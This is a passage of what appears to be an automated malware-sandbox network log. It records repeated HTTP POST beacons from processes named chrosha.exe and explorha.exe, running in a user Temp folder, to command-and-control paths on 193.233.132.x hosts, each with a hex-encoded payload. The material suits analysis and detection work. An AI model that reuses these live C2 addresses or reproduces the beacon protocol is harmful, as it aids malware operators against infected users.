                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:56.619240046 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
215 | 192.168.2.5 | 50056 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:56.867306948 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:57.116779089 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:57.117664099 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:57.372199059 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
216 | 192.168.2.5 | 50057 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:56.977468014 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:57.222347021 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
217 | 192.168.2.5 | 50058 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:57.477798939 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:57.734023094 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
218 | 192.168.2.5 | 50059 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:57.726686954 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:57.976329088 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:57.977828026 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:58.231252909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
219 | 192.168.2.5 | 50060 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:58.084778070 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:58.331248999 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
220 | 192.168.2.5 | 50061 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:58.582355022 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:58.835098982 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
221 | 192.168.2.5 | 50062 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:58.585127115 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:58.833991051 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:58.836147070 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:59.089234114 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
222 | 192.168.2.5 | 50063 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:59.187922001 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:59.431694984 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
223 | 192.168.2.5 | 50064 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:59.445780039 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:59.692914963 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:59.693774939 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:59.947263956 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
224 | 192.168.2.5 | 50065 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:59.687695026 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:59.941808939 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
225 | 192.168.2.5 | 50066 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:00.300474882 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:00.545855999 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:31:00.547195911 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:00.802133083 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
226 | 192.168.2.5 | 50067 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:00.307631969 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:00.557837009 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
227 | 192.168.2.5 | 50068 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:00.804778099 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:01.053189993 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:31:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
228 | 192.168.2.5 | 50069 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:01.157346964 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:31:01.400033951 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
